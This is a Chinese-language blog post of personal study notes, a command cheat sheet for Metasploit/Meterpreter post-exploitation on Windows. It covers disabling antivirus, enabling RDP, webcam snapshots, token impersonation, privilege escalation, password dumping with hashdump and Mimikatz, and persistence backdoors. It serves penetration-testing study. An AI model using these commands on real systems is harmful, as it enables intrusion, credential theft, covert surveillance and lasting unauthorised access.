See_You

冲鸭!!

Metaspliot技术

Metaspliot学习笔记

信息收集

进程迁移

getuid    #获取一个Meterpreter Shell时,该shell比较脆弱,需要进行迁移
ps 
migrate 进程号   #选择需要迁移的端口

 系统命令

sysinfo  #查看系统信息
post/windows/gather/checkvm  #检查目标是否运行在虚拟机
route  #查看路由信息
post/windows/manage/killav  #关闭目标机杀毒软件
post/windows/manage/enable_rdp  #开启目标机远程桌面
post/windows/manage/autoroute   #查看目标机的本地子网信息
post/windows/gather/enum_logged_on_users  #枚举当前有多少用户登录
post/windows/gather/enum_applications   #枚举目标机上的应用程序
screenshot  #屏幕截图
webcam_list  #列出摄像头
webcam_snap  #摄像头拍照

 文件系统命令

pwd或者getwd  #查看当前处于目标机的那个目录
getlwd  #查看当前处于本地那个目录
ls  #列出当前处于目标机目录的文件
search -f 文件名 -d  目录  #搜索目标机目录中的文件
download 目标机文件目录   本地机目录  #下载文件至本地
upload /root/test.txt C:\   #上传文件

 权限提升

权限查询

whoami /groups   #在cmd下查询当前权限

 本地溢出漏洞提权

getsystem  #一般直接提权会失败,需绕过UAC
可以对比系统补丁search exp进行提权

 令牌窃取

使用use incognito命令,然后使用list_token -u 列出所有可用的token
impersonate_token  win\\Administrator #假冒Administrator用户

 hash攻击

使用hashdump

hashdump  #非system权限下可能会失败
run post/windows/gather/smart_hashdump  #WIN 7需提前绕过UAC

使用Quarks PwDump抓取密码(PwDump是一款系统授权信息导出工具)

使用Windows Credentials Editor抓取密码(一款强大的内网渗透工具)

upload /root/wce.exe C:\   #上传工具

 使用Mimikatz抓取密码(必须在system权限下运行)

load mimikatz  #加载工具到msf, 默认加载32位的,若系统为64位,需要提前将进程迁移至64位进程
msv #获取登录密码的hash
kerberos #获取明文密码,但有时候甚至密文密码都获取不到
mimikatz_command -f samdump::hashes #当kerberos获取不到时使用
mimikatz_command -f sekurlsa::searchPasswords

简单命令:wdigest 或者 tspkg

 创建后门

Windows创建后门
run persistence -h #查看后门参数,通过安装自启动建立后门
php/aspx/asp后门
利用msfvenom生成相应的木马,上传,然后msf建立监听即可

 

posted @ 2020-04-07 21:37  Focusal  阅读(265)  评论(0编辑  收藏  举报
Live2D